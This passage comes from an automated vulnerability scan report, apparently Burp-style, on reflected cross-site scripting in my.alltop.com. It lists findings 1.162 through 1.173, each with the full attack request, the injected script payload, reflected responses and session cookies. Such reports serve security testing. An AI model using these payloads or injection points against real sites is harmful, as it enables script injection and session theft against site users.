Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)?2bb98"><script>alert(1)</script>dcc1bc07c78=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.162. http://my.alltop.com/alpha/j [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/j

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dab"><script>alert(1)</script>aa8fbb20ad8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/jd0dab"><script>alert(1)</script>aa8fbb20ad8 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/jd0dab"><script>alert(1)</script>aa8fbb20ad8" method="post" accept-charset="utf-8">
...[SNIP]...

1.163. http://my.alltop.com/alpha/j [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/j

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddccc"><script>alert(1)</script>605005c33ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/j?ddccc"><script>alert(1)</script>605005c33ec=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/j?ddccc"><script>alert(1)</script>605005c33ec=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.164. http://my.alltop.com/alpha/k [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/k

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a51"><script>alert(1)</script>9c12012f8ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ka3a51"><script>alert(1)</script>9c12012f8ff HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ka3a51"><script>alert(1)</script>9c12012f8ff" method="post" accept-charset="utf-8">
...[SNIP]...

1.165. http://my.alltop.com/alpha/k [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/k

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2696"><script>alert(1)</script>291d523a08e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/k?f2696"><script>alert(1)</script>291d523a08e=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:56 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/k?f2696"><script>alert(1)</script>291d523a08e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.166. http://my.alltop.com/alpha/l [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/l

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1252c"><script>alert(1)</script>59089a52316 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/l1252c"><script>alert(1)</script>59089a52316 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/l1252c"><script>alert(1)</script>59089a52316" method="post" accept-charset="utf-8">
...[SNIP]...

1.167. http://my.alltop.com/alpha/l [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/l

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd7"><script>alert(1)</script>be0c37c660d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/l?27cd7"><script>alert(1)</script>be0c37c660d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/l?27cd7"><script>alert(1)</script>be0c37c660d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.168. http://my.alltop.com/alpha/m [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/m

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1244d"><script>alert(1)</script>a99132f65f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/m1244d"><script>alert(1)</script>a99132f65f8 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/m1244d"><script>alert(1)</script>a99132f65f8" method="post" accept-charset="utf-8">
...[SNIP]...

1.169. http://my.alltop.com/alpha/n [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/n

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b35"><script>alert(1)</script>f201995fd05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/n79b35"><script>alert(1)</script>f201995fd05 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/n79b35"><script>alert(1)</script>f201995fd05" method="post" accept-charset="utf-8">
...[SNIP]...

1.170. http://my.alltop.com/alpha/n [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/n

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd04a"><script>alert(1)</script>b03f8355e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/n?dd04a"><script>alert(1)</script>b03f8355e2=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/n?dd04a"><script>alert(1)</script>b03f8355e2=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.171. http://my.alltop.com/alpha/o ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001DB)</script> request parameter is copied into the HTML document as plain text between tags. The payload 35250<script>alert(1)</script>e877022706a was submitted in the '"--></style></script><script>netsparker(0x0001DB)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o?'"--></style></script><script>netsparker(0x0001DB)</script>35250<script>alert(1)</script>e877022706a HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>35250<script>alert(1)</script>e877022706a" method="post" accept-charset="utf-8">
...[SNIP]...

1.172. http://my.alltop.com/alpha/o [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf0b"><script>alert(1)</script>36bf91129c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ocdf0b"><script>alert(1)</script>36bf91129c1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ocdf0b"><script>alert(1)</script>36bf91129c1" method="post" accept-charset="utf-8">
...[SNIP]...

1.173. http://my.alltop.com/alpha/o [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90db"><script>alert(1)</script>15dbfcc41db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o?f90db"><script>alert(1)</script>15dbfcc41db=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
